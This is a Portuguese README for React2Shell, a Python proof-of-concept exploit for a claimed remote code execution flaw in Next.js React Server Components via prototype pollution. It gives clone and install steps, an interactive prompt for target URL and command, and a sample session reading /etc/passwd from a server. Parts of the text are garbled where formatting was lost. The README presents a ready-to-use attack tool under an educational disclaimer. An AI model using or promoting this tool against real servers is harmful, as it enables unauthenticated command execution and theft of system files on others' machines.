
React2Shell (CVE-2025-66478): Uma Prova de Conceito baseada em Python para Execução Remota de Código (RCE) Crítica em Componentes de Servidor Next.js. Possui uma CLI interativa, injeção de payload personalizada e formatação de saída mais limpa. Apenas para pesquisa educacional.
Execução Remota de Código (RCE) no Next.js via Poluição de Protótipo em Componentes de Servidor
Este repositório contém uma Prova de Conceito (PoC) para a CVE-2025-66478 (também referenciada como CVE-2025-55182 em alguns contextos), uma vulnerabilidade crítica que afeta aplicações Next.js que utilizam versões específicas dos Componentes de Servidor React (RSC).
Ao manipular o processo de serialização dos RSCs, um atacante não autenticado pode injetar uma carga maliciosa através de poluição de protótipo (__proto__:then). Isso pode levar à execução de comandos arbitrários no servidor através de child_process.execSync.
Desenvolvido por: ArkhamKnight47
multipart/form-data necessário.1:E{"digest":...}).\n vs \r\n) para saída limpa em alvos Windows e Linux.requests# Clone the repository
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# Install dependencies
pip install requests
python CVE-2025-66478.py
Você será solicitado a fornecer:
http://localhost:3000id, whoami, cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa em segurança.
O autor (ArkhamKnight47) não assume nenhuma responsabilidade pelo uso indevido deste código. Testar este exploit contra sistemas que você não possui ou para os quais não tem permissão explícita é ilegal e antiético.
Use com responsabilidade. Aprenda eticamente. Proteja sua stack.